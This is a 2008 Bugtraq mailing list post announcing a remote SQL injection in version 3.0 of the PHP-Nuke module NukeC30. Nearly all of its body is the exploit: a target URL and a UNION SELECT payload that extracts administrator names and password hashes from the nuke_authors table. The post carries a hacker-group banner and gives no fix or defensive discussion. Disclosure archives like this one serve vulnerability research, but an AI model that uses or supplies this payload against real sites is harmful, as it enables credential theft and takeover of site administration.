Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

PHP-Nuke Module NukeC30 sql injection

From: houssamix () hotmail fr
Date: 11 Mar 2008 12:22:18 -0000
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix from H-T Team
                          
= Script : PHP-Nuke Module NukeC30    
                   Module's Name: NukeC30
                   Module's Version: 3.0
                                        
= BUG : Remote SQL Injection  
  
= Exploit :                                                  
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]

[SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2
                
= Greetz : All muslims HaCkers
Previous By Date Next
Previous By Thread Next

Current thread: